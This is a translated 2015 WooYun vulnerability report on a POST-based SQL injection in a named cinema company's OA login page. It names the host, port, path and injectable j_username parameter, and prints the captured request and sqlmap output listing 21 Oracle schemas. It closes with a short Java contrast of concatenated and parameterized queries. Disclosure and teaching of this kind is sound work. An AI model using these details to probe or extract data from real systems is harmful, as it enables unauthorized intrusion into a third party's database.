
Vulnerability summary

Defect ID: wooyun-2015-0145608

Title: POST-based SQL injection in a Jinyi Cinemas back-end system

Affected vendor: Guangzhou Jinyi Cinemas Co., Ltd. (广州金逸影城有限公司)

Author: Rand0m

Submitted: 2015-10-09 20:02

Fix deadline: 2015-11-23 20:04

Published: 2015-11-23 20:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-09: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-11-23: The vendor has actively ignored the vulnerability; details are now public

Brief description:

As in the title.

Detailed description:

POST-based SQL injection in the back-end login of a sub-site:

oa.jycinema.com:7890/easoa/login/kingdee_sso_auth.jsp


Captured request:

POST /easoa/login/kingdee_sso_auth.jsp HTTP/1.1
Host: oa.jycinema.com:7890
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://oa.jycinema.com:7890/easoa/themes/mskin/login/login.jsp?login_error=1
Cookie: JSESSIONID=93FAD348D0678DA8243338D317B90AB8; Hm_lvt_adf5d51b91f5f12a36b09c0fe5f761df=1444390267; Hm_lpvt_adf5d51b91f5f12a36b09c0fe5f761df=1444390314; userClose=0; clientlanguage=zh_CN
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
j_mode=static&j_from=oa&j_locale=zh_CN&j_username=admin&j_password=111&Submit=login


The j_username parameter is injectable.
Stack: Oracle + JSP.
Vendor contact details:
Guangzhou Jinyi Film & Media Co., Ltd. (广州金逸影视传媒股份有限公司)
Address: 4/F, Leighton Sunshine Building (礼顿阳光大厦), No. 8 Huacheng Road, Zhujiang New Town, Tianhe District, Guangzhou
Postal code: 510623
Telephone: 020-87513960

Proof of vulnerability:

web application technology: JSP
back-end DBMS: Oracle
[19:45:51] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[19:45:51] [INFO] fetching database (schema) names
[19:45:56] [INFO] the SQL query used returns 21 entries
[19:45:59] [INFO] retrieved: APEX_030200
[19:46:02] [INFO] retrieved: APPQOSSYS
[19:46:05] [INFO] retrieved: CTXSYS
[19:46:08] [INFO] retrieved: DBSNMP
[19:46:11] [INFO] retrieved: EASDB
[19:46:14] [INFO] retrieved: EXFSYS
[19:46:17] [INFO] retrieved: FLOWS_FILES
[19:46:20] [INFO] retrieved: MDSYS
[19:46:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
going to retry the request
[19:46:54] [INFO] retrieved: OLAPSYS
[19:46:58] [INFO] retrieved: ORDDATA
[19:47:01] [INFO] retrieved: ORDSYS
[19:47:03] [INFO] retrieved: OUTLN
[19:47:07] [INFO] retrieved: OWBSYS
[19:47:10] [INFO] retrieved: RHEAS
[19:47:13] [INFO] retrieved: SCOTT
[19:47:15] [INFO] retrieved: SHEAS
[19:47:18] [INFO] retrieved: SYS
[19:47:21] [INFO] retrieved: SYSMAN
[19:47:24] [INFO] retrieved: SYSTEM
[19:47:27] [INFO] retrieved: WMSYS
[19:47:30] [INFO] retrieved: XDB
available databases [21]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EASDB
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RHEAS
[*] SCOTT
[*] SHEAS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

Remediation:

Filter the input. We hope Jinyi will register as a WooYun vendor to improve its security.

Copyright notice: when reposting, please credit the source: Rand0m@乌云 (WooYun)
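As an added illustration of the remediation (example code, not from the vendor or from this report): the login lookup written first with string concatenation, the pattern that lets a value like j_username alter the query, and then with a bound-parameter query plus an input whitelist. The table and column names (EASOA_USER, USERNAME, PASSWORD_HASH) are hypothetical.

```java
// Added example, not the vendor's code. Table/column names are hypothetical.
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.regex.Pattern;

public class LoginDao {

    // Vulnerable pattern: the username is spliced into the SQL text, so the
    // database parses user-controlled input as part of the statement.
    static boolean authenticateUnsafe(Connection c, String user, String pwHash)
            throws SQLException {
        String sql = "SELECT 1 FROM EASOA_USER WHERE USERNAME = '" + user
                   + "' AND PASSWORD_HASH = '" + pwHash + "'";
        try (Statement st = c.createStatement();
             ResultSet rs = st.executeQuery(sql)) {
            return rs.next();
        }
    }

    // Hardened: the statement shape is fixed at prepare time and both inputs
    // are bound as data, so quoting in the input cannot change the query.
    private static final String AUTH_SQL =
        "SELECT 1 FROM EASOA_USER WHERE USERNAME = ? AND PASSWORD_HASH = ?";

    // Defence in depth: reject anything that is not a plausible username
    // before it reaches the database at all (hypothetical policy).
    private static final Pattern USERNAME_OK =
        Pattern.compile("^[A-Za-z0-9_.@-]{1,64}$");

    static boolean authenticateSafe(Connection c, String user, String pwHash)
            throws SQLException {
        if (user == null || !USERNAME_OK.matcher(user).matches()) {
            return false;
        }
        try (PreparedStatement ps = c.prepareStatement(AUTH_SQL)) {
            ps.setString(1, user);
            ps.setString(2, pwHash);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }
}
```

The whitelist is a secondary control; the bound parameters are what actually close the injection, and they work for any Oracle JDBC driver.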


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined the report.

Vulnerability Rank: 15 (WooYun rating)